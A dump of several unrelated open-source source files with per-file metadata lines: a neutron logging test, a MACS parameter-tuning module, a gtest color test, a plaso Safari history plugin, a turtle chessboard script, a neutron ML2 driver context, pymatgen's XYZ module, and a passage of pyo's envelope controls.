def test_method(self, arg1, arg2, *args, **kwargs):
pass
class TestCallLog(base.BaseTestCase):
def setUp(self):
super(TestCallLog, self).setUp()
self.klass = TargetKlass()
self.expected_format = ('%(class_name)s method %(method_name)s '
'called with arguments %(args)s %(kwargs)s')
self.expected_data = {'class_name': MODULE_NAME + '.TargetKlass',
'method_name': 'test_method',
'args': (),
'kwargs': {}}
def test_call_log_all_args(self):
self.expected_data['args'] = (10, 20)
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_all_kwargs(self):
self.expected_data['kwargs'] = {'arg1': 10, 'arg2': 20}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(arg1=10, arg2=20)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_unknown_args_kwargs(self):
self.expected_data['args'] = (10, 20, 30)
self.expected_data['kwargs'] = {'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, 20, 30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
def test_call_log_known_args_kwargs_unknown_kwargs(self):
self.expected_data['args'] = (10,)
self.expected_data['kwargs'] = {'arg2': 20, 'arg3': 30, 'arg4': 40}
with mock.patch.object(call_log.LOG, 'debug') as log_debug:
self.klass.test_method(10, arg2=20, arg3=30, arg4=40)
log_debug.assert_called_once_with(self.expected_format,
self.expected_data)
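# Minimal sketch of what the decorator does outside of mock (hypothetical;
# assumes a neutron environment where these modules import cleanly):
#
#   obj = TargetKlass()
#   obj.test_method(1, 2, arg3=3)   # emits one LOG.debug record built from
#                                   # the class name, method name, args, kwargs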
| apache-2.0 | -2,569,345,095,315,506,000 | 41.042857 | 78 | 0.589534 | false |
odb9402/OPPA | oppa/macs/archive.py | 1 | 5675 | """
This module tunes MACS parameters using Bayesian optimization. If we run
these functions in parallel, we need to satisfy several conditions that
are mentioned in the paper 'Practical Bayesian Optimization of Machine
Learning Algorithms'.
"""
from math import exp
import subprocess
import time
from multiprocessing import cpu_count
from multiprocessing import Process
from ..optimizeHyper import run as optimizeHyper
from ..calculateError import run as calculateError
from ..loadParser.loadLabel import run as loadLabel
from ..loadParser.parseLabel import run as parseLabel
def learnMACSparam(args, test_set, validation_set, PATH):
"""
    This function controls the learning steps. ``args`` is given by
    oppa.py (the main entry point of this program) from the command line,
    and wrapper functions are built for the BayesianOptimization library;
    only the wrapper functions' arguments will be learned by the library.
    :param args:
        arguments from the command line
    :param test_set:
        python list of the test set
    :param validation_set:
        python list of the validation set
    :return: learned parameters.
"""
input_file = args.input
control = args.control
call_type = args.callType
def wrapper_narrow_cut(opt_Qval):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control)
print "Qval :"+str(exp(opt_Qval/100)-1)
return correct
def wrapper_broad_cut(opt_Qval, opt_cutoff):
correct = run(input_file, validation_set, str(exp(opt_Qval/100)-1), call_type, control, broad=str(exp(opt_cutoff/100)-1))
print "Qval :"+str(exp(opt_Qval/100)-1), "Broad-cutoff:"+str(exp(opt_cutoff/100)-1)
return correct
parameters_bounds_narrow = {'opt_Qval':(10**-8,60.0)}
parameters_bounds_broad = {'opt_Qval':(10**-8,60.0),\
'opt_cutoff':(10**-7,60.0)}
number_of_init_sample = 2
if call_type is None:
result = optimizeHyper(wrapper_narrow_cut, parameters_bounds_narrow, number_of_init_sample)
subprocess.call(['macs2','callpeak','-t',input_file,'-c',control,'-g','hs','-q',str(result['max_params']['opt_Qval'])])
print " final error about test set is :::" + str(final_error)
else:
result = optimizeHyper(wrapper_broad_cut, parameters_bounds_broad, number_of_init_sample)
def run(input_file, valid_set, Qval, call_type, control = None, broad=None):
"""
    This function runs MACS and calculates the error in one step.
    Each argument is given by learnMACSparam from the command line.
:param input_file:
input file name.
:param valid_set:
python list of labeled data
:param Qval:
Q-value of MACS. it will be learned.
:param control:
control bam file in MACS. not necessary.
:return:
        error rate between the MACS output and the labeled data.
"""
import MACS
chromosome_list = []
for label in valid_set:
chromosome_list.append(label.split(':')[0])
chromosome_list = list(set(chromosome_list))
reference_char = ".REF_"
bam_name = input_file[:-4] ## delete '.bam'
if control is not None:
cr_bam_name = control[:-4]
MAX_CORE = cpu_count()
TASKS = len(chromosome_list)
TASK_NO = 0
macs_processes = []
while (len(macs_processes) < MAX_CORE-1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
while len(macs_processes) > 0:
time.sleep(0.1)
for proc in reversed(range(len(macs_processes))):
if macs_processes[proc].poll() is not None:
del macs_processes[proc]
while (len(macs_processes) < MAX_CORE - 1) and (TASK_NO < TASKS):
if control is not None:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, cr_bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", broad))
else:
macs_processes.append(MACS.run(bam_name + reference_char + chromosome_list[TASK_NO] + ".bam", Qval, call_type, broad=broad))
TASK_NO += 1
    # there must be a valid validation set and test set.
    if not valid_set:
        print "there is no matched validation set :p\n"
exit()
#actual learning part
else:
error_num, label_num = summerize_error(bam_name, valid_set, call_type)
        if label_num == 0:
            return 1.0
        return (1 - float(error_num) / label_num) * 100
def summerize_error(bam_name, validation_set, call_type):
"""
:param bam_name:
:param validation_set:
:return:
"""
sum_error_num = 0
sum_label_num = 0
reference_char = ".REF_chr"
if call_type == "broad":
output_format_name = '.broadPeak'
else:
output_format_name = '.narrowPeak'
for chr_no in range(22):
input_name = bam_name + reference_char + str(chr_no+1) + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
# add about sexual chromosome
input_name = bam_name + reference_char + 'X' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
input_name = bam_name + reference_char + 'Y' + ".bam_peaks" + output_format_name
error_num, label_num = calculateError(input_name, parseLabel(validation_set, input_name))
sum_error_num += error_num
sum_label_num += label_num
    return sum_error_num, sum_label_num
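# Hypothetical driver code (a sketch; ``args`` must provide .input, .control
# and .callType as used in learnMACSparam above, and test_set/validation_set
# are python lists of labeled regions loaded elsewhere in oppa):
#
#   learnMACSparam(args, test_set, validation_set, PATH='./')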
| mit | 2,470,161,333,468,017,000 | 32.579882 | 188 | 0.687225 | false |
charlescearl/VirtualMesos | third_party/libprocess/third_party/gmock-1.6.0/gtest/test/gtest_color_test.py | 3259 | 4911 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly determines whether to use colors."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name == 'nt'
COLOR_ENV_VAR = 'GTEST_COLOR'
COLOR_FLAG = 'gtest_color'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_color_test_')
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def UsesColor(term, color_env_var, color_flag):
"""Runs gtest_color_test_ and returns its exit code."""
SetEnvVar('TERM', term)
SetEnvVar(COLOR_ENV_VAR, color_env_var)
if color_flag is None:
args = []
else:
args = ['--%s=%s' % (COLOR_FLAG, color_flag)]
p = gtest_test_utils.Subprocess([COMMAND] + args)
return not p.exited or p.exit_code
class GTestColorTest(gtest_test_utils.TestCase):
def testNoEnvVarNoFlag(self):
"""Tests the case when there's neither GTEST_COLOR nor --gtest_color."""
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', None, None))
self.assert_(not UsesColor('emacs', None, None))
self.assert_(not UsesColor('xterm-mono', None, None))
self.assert_(not UsesColor('unknown', None, None))
self.assert_(not UsesColor(None, None, None))
self.assert_(UsesColor('linux', None, None))
self.assert_(UsesColor('cygwin', None, None))
self.assert_(UsesColor('xterm', None, None))
self.assert_(UsesColor('xterm-color', None, None))
self.assert_(UsesColor('xterm-256color', None, None))
def testFlagOnly(self):
"""Tests the case when there's --gtest_color but not GTEST_COLOR."""
self.assert_(not UsesColor('dumb', None, 'no'))
self.assert_(not UsesColor('xterm-color', None, 'no'))
if not IS_WINDOWS:
self.assert_(not UsesColor('emacs', None, 'auto'))
self.assert_(UsesColor('xterm', None, 'auto'))
self.assert_(UsesColor('dumb', None, 'yes'))
self.assert_(UsesColor('xterm', None, 'yes'))
def testEnvVarOnly(self):
"""Tests the case when there's GTEST_COLOR but not --gtest_color."""
self.assert_(not UsesColor('dumb', 'no', None))
self.assert_(not UsesColor('xterm-color', 'no', None))
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', 'auto', None))
self.assert_(UsesColor('xterm-color', 'auto', None))
self.assert_(UsesColor('dumb', 'yes', None))
self.assert_(UsesColor('xterm-color', 'yes', None))
def testEnvVarAndFlag(self):
"""Tests the case when there are both GTEST_COLOR and --gtest_color."""
self.assert_(not UsesColor('xterm-color', 'no', 'no'))
self.assert_(UsesColor('dumb', 'no', 'yes'))
self.assert_(UsesColor('xterm-color', 'no', 'auto'))
def testAliasesOfYesAndNo(self):
"""Tests using aliases in specifying --gtest_color."""
self.assert_(UsesColor('dumb', None, 'true'))
self.assert_(UsesColor('dumb', None, 'YES'))
self.assert_(UsesColor('dumb', None, 'T'))
self.assert_(UsesColor('dumb', None, '1'))
self.assert_(not UsesColor('xterm', None, 'f'))
self.assert_(not UsesColor('xterm', None, 'false'))
self.assert_(not UsesColor('xterm', None, '0'))
self.assert_(not UsesColor('xterm', None, 'unknown'))
if __name__ == '__main__':
gtest_test_utils.Main()
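# Hypothetical direct invocation (the gtest_color_test_ binary must already
# be built where gtest_test_utils.GetTestExecutablePath can find it):
#
#   $ python gtest_color_test.py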
| apache-2.0 | 5,851,284,731,570,305,000 | 36.776923 | 76 | 0.69212 | false |
joachimmetz/plaso | plaso/parsers/plist_plugins/safari.py | 2 | 3592 | # -*- coding: utf-8 -*-
"""Plist parser plugin for Safari history plist files."""
from dfdatetime import cocoa_time as dfdatetime_cocoa_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import plist
from plaso.parsers.plist_plugins import interface
class SafariHistoryEventData(events.EventData):
"""Safari history event data.
Attributes:
display_title (str): display title of the webpage visited.
title (str): title of the webpage visited.
url (str): URL visited.
visit_count (int): number of times the website was visited.
was_http_non_get (bool): True if the webpage was visited using a non-GET
HTTP request.
"""
DATA_TYPE = 'safari:history:visit'
def __init__(self):
"""Initializes event data."""
super(SafariHistoryEventData, self).__init__(data_type=self.DATA_TYPE)
self.display_title = None
self.title = None
self.url = None
self.visit_count = None
self.was_http_non_get = None
class SafariHistoryPlugin(interface.PlistPlugin):
"""Plist parser plugin for Safari history plist files."""
NAME = 'safari_history'
DATA_FORMAT = 'Safari history plist file'
PLIST_PATH_FILTERS = frozenset([
interface.PlistPathFilter('History.plist')])
PLIST_KEYS = frozenset(['WebHistoryDates', 'WebHistoryFileVersion'])
# pylint: disable=arguments-differ
def _ParsePlist(self, parser_mediator, match=None, **unused_kwargs):
"""Extracts Safari history items.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
match (Optional[dict[str: object]]): keys extracted from PLIST_KEYS.
"""
format_version = match.get('WebHistoryFileVersion', None)
if format_version != 1:
parser_mediator.ProduceExtractionWarning(
'unsupported Safari history version: {0!s}'.format(format_version))
return
if 'WebHistoryDates' not in match:
return
for history_entry in match.get('WebHistoryDates', {}):
last_visited_date = history_entry.get('lastVisitedDate', None)
if last_visited_date is None:
parser_mediator.ProduceExtractionWarning('missing last visited date')
continue
try:
# Last visited date is a string containing a floating point value.
timestamp = float(last_visited_date)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'unable to convert last visited date {0:s}'.format(
last_visited_date))
continue
display_title = history_entry.get('displayTitle', None)
event_data = SafariHistoryEventData()
if display_title != event_data.title:
event_data.display_title = display_title
event_data.title = history_entry.get('title', None)
      # The URL is stored under an empty string key in the Safari plist.
      event_data.url = history_entry.get('', None)
event_data.visit_count = history_entry.get('visitCount', None)
event_data.was_http_non_get = history_entry.get(
'lastVisitWasHTTPNonGet', None)
# Convert the floating point value to an integer.
# TODO: add support for the fractional part of the floating point value.
timestamp = int(timestamp)
date_time = dfdatetime_cocoa_time.CocoaTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_VISITED)
parser_mediator.ProduceEventWithEventData(event, event_data)
plist.PlistParser.RegisterPlugin(SafariHistoryPlugin)
| apache-2.0 | 8,460,172,211,647,911,000 | 34.564356 | 78 | 0.697105 | false |
Valka7a/python-playground | python-course-softuni/introduction-python3/lecture-one-excercises/ex7.py | 1 | 1947 | import turtle
# Get user's input
board_size = input('Enter board size: ')
# Validate user's input
try:
board_size = int(board_size)
if board_size < 8:
        raise Exception('Board size cannot be less than 8.')
except ValueError:
print('Invalid input!')
exit()
except Exception as error:
print(error)
exit()
# Configure turtle's color based on current row and col
def configure_turtle_color(row, col):
if row % 2 == 1:
col += 1
if col % 2 == 0:
turtle.color('black')
return
turtle.color('white')
# Draw single square with the size provided
def draw_square(size, fill=True):
if fill:
turtle.begin_fill()
for _ in range(4):
turtle.forward(size)
turtle.left(90)
if fill:
turtle.end_fill()
# Draw borders around the board,
# so it can be seen properly with
# any background color
def draw_board_borders():
turtle.penup()
turtle.color('black')
turtle.goto(-1, -1)
turtle.pendown()
draw_square(board_size + 2, False)
turtle.penup()
turtle.color('white')
turtle.goto(-2, -2)
turtle.pendown()
draw_square(board_size + 4, False)
# Draw the chess board
def draw_chess_board():
    item_length = board_size / 8.0  # float division so the squares span the whole board
row = x_coord = y_coord = 0
for number in range(1, 65):
configure_turtle_color(row, number)
turtle.penup()
turtle.goto(x_coord, y_coord)
turtle.pendown()
draw_square(item_length)
x_coord += item_length
if number % 8 == 0:
row += 1
x_coord = 0
y_coord += item_length
draw_board_borders()
# Configure the turtle
turtle.speed('fastest')
turtle.bgcolor('brown')
# Draw
draw_chess_board()
# Move the turtle to the side,
# so the chessboard is easier to see
# when it has a smaller size
turtle.penup()
turtle.goto(-10, -10)
# Wait for user's click to exit
turtle.exitonclick() | mit | -3,479,351,856,676,497,400 | 17.912621 | 60 | 0.611197 | false |
subramani95/neutron | neutron/plugins/ml2/driver_context.py | 6 | 4610 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.openstack.common import jsonutils
from neutron.plugins.ml2 import db
from neutron.plugins.ml2 import driver_api as api
class MechanismDriverContext(object):
"""MechanismDriver context base class."""
def __init__(self, plugin, plugin_context):
self._plugin = plugin
# This temporarily creates a reference loop, but the
# lifetime of PortContext is limited to a single
# method call of the plugin.
self._plugin_context = plugin_context
class NetworkContext(MechanismDriverContext, api.NetworkContext):
def __init__(self, plugin, plugin_context, network,
original_network=None):
super(NetworkContext, self).__init__(plugin, plugin_context)
self._network = network
self._original_network = original_network
self._segments = db.get_network_segments(plugin_context.session,
network['id'])
@property
def current(self):
return self._network
@property
def original(self):
return self._original_network
@property
def network_segments(self):
return self._segments
class SubnetContext(MechanismDriverContext, api.SubnetContext):
def __init__(self, plugin, plugin_context, subnet, original_subnet=None):
super(SubnetContext, self).__init__(plugin, plugin_context)
self._subnet = subnet
self._original_subnet = original_subnet
@property
def current(self):
return self._subnet
@property
def original(self):
return self._original_subnet
class PortContext(MechanismDriverContext, api.PortContext):
def __init__(self, plugin, plugin_context, port, network,
original_port=None):
super(PortContext, self).__init__(plugin, plugin_context)
self._port = port
self._original_port = original_port
self._network_context = NetworkContext(plugin, plugin_context,
network)
self._binding = db.ensure_port_binding(plugin_context.session,
port['id'])
if original_port:
self._original_bound_segment_id = self._binding.segment
self._original_bound_driver = self._binding.driver
else:
self._original_bound_segment_id = None
self._original_bound_driver = None
self._new_port_status = None
@property
def current(self):
return self._port
@property
def original(self):
return self._original_port
@property
def network(self):
return self._network_context
@property
def bound_segment(self):
id = self._binding.segment
if id:
for segment in self._network_context.network_segments:
if segment[api.ID] == id:
return segment
@property
def original_bound_segment(self):
if self._original_bound_segment_id:
for segment in self._network_context.network_segments:
if segment[api.ID] == self._original_bound_segment_id:
return segment
@property
def bound_driver(self):
return self._binding.driver
@property
def original_bound_driver(self):
return self._original_bound_driver
def host_agents(self, agent_type):
return self._plugin.get_agents(self._plugin_context,
filters={'agent_type': [agent_type],
'host': [self._binding.host]})
def set_binding(self, segment_id, vif_type, vif_details,
status=None):
# TODO(rkukura) Verify binding allowed, segment in network
self._binding.segment = segment_id
self._binding.vif_type = vif_type
self._binding.vif_details = jsonutils.dumps(vif_details)
self._new_port_status = status
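# Hypothetical mechanism driver using a PortContext during port binding
# (a minimal sketch; the vif_type/vif_details values are illustrative only):
#
#   class MyMechDriver(object):
#       def bind_port(self, context):
#           segment = context.network.network_segments[0]
#           context.set_binding(segment[api.ID], 'ovs',
#                               {'port_filter': True})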
| apache-2.0 | 5,014,478,164,792,545,000 | 33.148148 | 78 | 0.619957 | false |
montoyjh/pymatgen | pymatgen/io/xyz.py | 5 | 4144 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import re
from pymatgen.core.structure import Molecule
from monty.io import zopen
"""
Module implementing an XYZ file object class.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "Apr 17, 2012"
class XYZ:
"""
Basic class for importing and exporting Molecules or Structures in XYZ
format.
Args:
mol: Input molecule or list of molecules
.. note::
Exporting periodic structures in the XYZ format will lose information
about the periodicity. Essentially, only cartesian coordinates are
written in this format and no information is retained about the
lattice.
"""
def __init__(self, mol, coord_precision=6):
if isinstance(mol, Molecule) or not isinstance(mol, list):
self._mols = [mol]
else:
self._mols = mol
self.precision = coord_precision
@property
def molecule(self):
"""
Returns molecule associated with this XYZ. In case multiple frame
XYZ, returns the last frame.
"""
return self._mols[-1]
@property
def all_molecules(self):
"""
Returns all the frames of molecule associated with this XYZ.
"""
return self._mols
@staticmethod
def _from_frame_string(contents):
"""
Convert a single frame XYZ string to a molecule
"""
lines = contents.split("\n")
num_sites = int(lines[0])
coords = []
sp = []
coord_patt = re.compile(
r"(\w+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)"
)
for i in range(2, 2 + num_sites):
m = coord_patt.search(lines[i])
if m:
sp.append(m.group(1)) # this is 1-indexed
# this is 0-indexed
# in case of 0.0D+00 or 0.00d+01 old double precision writing
# replace d or D by e for ten power exponent
xyz = [val.lower().replace("d", "e") for val in m.groups()[1:4]]
coords.append([float(val) for val in xyz])
return Molecule(sp, coords)
@staticmethod
def from_string(contents):
"""
Creates XYZ object from a string.
Args:
contents: String representing an XYZ file.
Returns:
XYZ object
"""
if contents[-1] != "\n":
contents += "\n"
white_space = r"[ \t\r\f\v]"
natoms_line = white_space + r"*\d+" + white_space + r"*\n"
comment_line = r"[^\n]*\n"
coord_lines = r"(\s*\w+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s*\n)+"
frame_pattern_text = natoms_line + comment_line + coord_lines
pat = re.compile(frame_pattern_text, re.MULTILINE)
mols = []
for xyz_match in pat.finditer(contents):
xyz_text = xyz_match.group(0)
mols.append(XYZ._from_frame_string(xyz_text))
return XYZ(mols)
@staticmethod
def from_file(filename):
"""
Creates XYZ object from a file.
Args:
filename: XYZ filename
Returns:
XYZ object
"""
with zopen(filename) as f:
return XYZ.from_string(f.read())
def _frame_str(self, frame_mol):
output = [str(len(frame_mol)), frame_mol.composition.formula]
fmtstr = "{{}} {{:.{0}f}} {{:.{0}f}} {{:.{0}f}}".format(self.precision)
for site in frame_mol:
output.append(fmtstr.format(site.specie, site.x, site.y, site.z))
return "\n".join(output)
def __str__(self):
return "\n".join([self._frame_str(mol) for mol in self._mols])
def write_file(self, filename):
"""
Writes XYZ to file.
Args:
filename: File name of output file.
"""
with zopen(filename, "wt") as f:
f.write(self.__str__())
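# Example round trip (hypothetical file names; a minimal sketch, assuming
# pymatgen is installed and "molecule.xyz" exists):
#
#   xyz = XYZ.from_file("molecule.xyz")
#   mol = xyz.molecule                  # last frame as a Molecule
#   XYZ(mol).write_file("molecule_copy.xyz")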
| mit | -1,933,247,107,292,179,200 | 29.028986 | 96 | 0.545849 | false |
jpippy/pyo | pyolib/controls.py | 5 | 24741 | """
Objects designed to create parameter's control at audio rate.
These objects can be used to create envelopes, line segments
and conversion from python number to audio signal.
The audio streams of these objects can't be sent to the output
soundcard.
"""
"""
Copyright 2009-2015 Olivier Belanger
This file is part of pyo, a python module to help digital signal
processing script creation.
pyo is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pyo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with pyo. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
from _core import *
from _maps import *
from _widgets import createGraphWindow
from types import ListType, TupleType
######################################################################
### Controls
######################################################################
class Fader(PyoObject):
"""
Fadein - fadeout envelope generator.
Generate an amplitude envelope between 0 and 1 with control on fade
times and total duration of the envelope.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
fadein : float, optional
Rising time of the envelope in seconds. Defaults to 0.01.
fadeout : float, optional
Falling time of the envelope in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the fadeout.
.. note::
The out() method is bypassed. Fader's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Fader(fadein=0.5, fadeout=0.5, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, fadein=0.01, fadeout=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnOO", fadein, fadeout, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._fadein = fadein
self._fadeout = fadeout
self._dur = dur
fadein, fadeout, dur, mul, add, lmax = convertArgsToLists(fadein, fadeout, dur, mul, add)
self._base_objs = [Fader_base(wrap(fadein,i), wrap(fadeout,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setFadein(self, x):
"""
Replace the `fadein` attribute.
:Args:
x : float
new `fadein` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadein = x
x, lmax = convertArgsToLists(x)
[obj.setFadein(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setFadeout(self, x):
"""
Replace the `fadeout` attribute.
:Args:
x : float
new `fadeout` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadeout = x
x, lmax = convertArgsToLists(x)
[obj.setFadeout(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10., 'lin', 'fadein', self._fadein, dataOnly=True),
SLMap(0, 10., 'lin', 'fadeout', self._fadeout, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def fadein(self):
"""float. Rising time of the envelope in seconds."""
return self._fadein
@fadein.setter
def fadein(self, x): self.setFadein(x)
@property
def fadeout(self):
"""float. Falling time of the envelope in seconds."""
return self._fadeout
@fadeout.setter
def fadeout(self, x): self.setFadeout(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Adsr(PyoObject):
"""
Attack - Decay - Sustain - Release envelope generator.
Calculates the classical ADSR envelope using linear segments.
Duration can be set to 0 to give an infinite sustain. In this
case, the stop() method calls the envelope release part.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
attack : float, optional
Duration of the attack phase in seconds. Defaults to 0.01.
decay : float, optional
Duration of the decay in seconds. Defaults to 0.05.
sustain : float, optional
Amplitude of the sustain phase. Defaults to 0.707.
release : float, optional
Duration of the release in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the release phase.
.. note::
The out() method is bypassed. Adsr's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Adsr(attack=.01, decay=.2, sustain=.5, release=.1, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, attack=0.01, decay=0.05, sustain=0.707, release=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnnnOO", attack, decay, sustain, release, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._attack = attack
self._decay = decay
self._sustain = sustain
self._release = release
self._dur = dur
attack, decay, sustain, release, dur, mul, add, lmax = convertArgsToLists(attack, decay, sustain, release, dur, mul, add)
self._base_objs = [Adsr_base(wrap(attack,i), wrap(decay,i), wrap(sustain,i), wrap(release,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setAttack(self, x):
"""
Replace the `attack` attribute.
:Args:
x : float
new `attack` attribute.
"""
pyoArgsAssert(self, "n", x)
self._attack = x
x, lmax = convertArgsToLists(x)
[obj.setAttack(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDecay(self, x):
"""
Replace the `decay` attribute.
:Args:
x : float
new `decay` attribute.
"""
pyoArgsAssert(self, "n", x)
self._decay = x
x, lmax = convertArgsToLists(x)
[obj.setDecay(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setSustain(self, x):
"""
Replace the `sustain` attribute.
:Args:
x : float
new `sustain` attribute.
"""
pyoArgsAssert(self, "n", x)
self._sustain = x
x, lmax = convertArgsToLists(x)
[obj.setSustain(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setRelease(self, x):
"""
        Replace the `release` attribute.
        :Args:
            x : float
                new `release` attribute.
"""
pyoArgsAssert(self, "n", x)
self._release = x
x, lmax = convertArgsToLists(x)
[obj.setRelease(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 5, 'lin', 'attack', self._attack, dataOnly=True),
